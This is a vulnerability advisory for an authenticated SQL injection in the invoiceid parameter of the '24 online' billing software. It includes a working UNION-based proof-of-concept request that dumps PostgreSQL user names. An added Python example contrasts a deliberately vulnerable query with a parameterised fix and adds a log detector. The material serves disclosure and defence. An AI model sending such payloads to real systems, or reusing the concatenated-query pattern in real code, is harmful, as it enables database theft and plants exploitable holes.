Software name: 24 online
Version: 8.3.6 build 9.0
Vendor website: http://24onlinebilling.com

Potentially other versions older than this are vulnerable too.

Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in 
an SQL Command ('SQL Injection')

The invoiceid GET parameter on <base-url>/24online/webpages/myaccount/usersessionsummary.jsp is not filtered properly and leads to SQL Injection.

Authentication Required: Yes 

A non-privileged authenticated user can inject SQL commands through the invoiceid parameter of <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id>&fromdt=dd/mm/yyyy hh:mm:ss&todt=dd/mm/yyyy hh:mm:ss

This gives complete information disclosure of the stored database.

-----------------------------------
GET /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT+null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16 HTTP/1.1
Host: 10.100.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=5464B4DD2B003E1E73E34FF773CA7232; myaccountmenu_id=menu_5
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sun, 03 Jul 2016 09:59:41 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1
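
Added example, not part of the advisory and not 24online's code: the defect class behind this report (a session-summary lookup that splices invoiceid into the SQL text) beside the hardened form (strict integer check, then a bound parameter), plus the check a log reviewer would want for this endpoint: any request whose invoiceid is not a plain integer is anomalous, whatever keywords it carries. The advisory's application is JSP over PostgreSQL; the illustration below uses Python with an in-memory SQLite database, a constructed stand-in schema (the real tables are not published), and constructed request lines shaped like the PoC.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlparse

# invoiceid is documented as <numeric-id>; anything else is not a legitimate value.
INVOICE_RE = re.compile(r"[0-9]{1,18}")


def make_db():
    """Constructed stand-in schema (assumption: the real 24online tables are not published)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (invoiceid INTEGER, username TEXT, started TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, pwhash TEXT)")
    conn.executemany("INSERT INTO sessions VALUES (?, ?, ?)",
                     [(93043, "alice", "2016-07-03"), (93044, "bob", "2016-07-03")])
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("dbadmin", "hash-1"), ("reporting", "hash-2")])
    conn.commit()
    return conn


def session_summary_vulnerable(conn, invoiceid):
    """Pattern behind CWE-89: the parameter is concatenated into the SQL text,
    so a value carrying a UNION is executed as part of the statement."""
    sql = "SELECT invoiceid, username, started FROM sessions WHERE invoiceid = " + invoiceid
    return conn.execute(sql).fetchall()


def session_summary_safe(conn, invoiceid):
    """Hardened form: reject anything that is not a decimal integer, then bind
    the value as a parameter so it can never become SQL text."""
    if not INVOICE_RE.fullmatch(invoiceid):
        raise ValueError("invoiceid must be a decimal integer")
    sql = "SELECT invoiceid, username, started FROM sessions WHERE invoiceid = ?"
    return conn.execute(sql, (int(invoiceid),)).fetchall()


# Constructed payload shaped like the advisory's PoC (UNION ALL against another table).
CONSTRUCTED_PAYLOAD = "93043 UNION ALL SELECT NULL, name, pwhash FROM users--"


def invoiceid_is_suspicious(request_target):
    """Detection check for access logs: parse_qs decodes '+' and %XX escapes,
    so the comparison is made on the value the application would actually see."""
    query = parse_qs(urlparse(request_target).query, keep_blank_values=True)
    values = query.get("invoiceid", [])
    return any(not INVOICE_RE.fullmatch(v) for v in values)


# Constructed request targets in the shape of the advisory's URL (not real log data).
SAMPLE_TARGETS = [
    "/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043"
    "&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16",
    "/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT"
    "+null,usename%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44",
    "/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=&fromdt=06/05/2016%2019:37:44",
]


def flagged_targets(targets=SAMPLE_TARGETS):
    """Return the request targets a reviewer should look at."""
    return [t for t in targets if invoiceid_is_suspicious(t)]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable path returns:", session_summary_vulnerable(db, CONSTRUCTED_PAYLOAD))
    try:
        session_summary_safe(db, CONSTRUCTED_PAYLOAD)
    except ValueError as exc:
        print("hardened path rejects it:", exc)
    print("flagged request targets:", flagged_targets())
```

The vulnerable function returns the users table rows appended to the session row; the hardened one raises before any SQL runs. The detector flags on type rather than on keywords, so an empty or non-numeric invoiceid is caught as well as the UNION form shown in the advisory.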
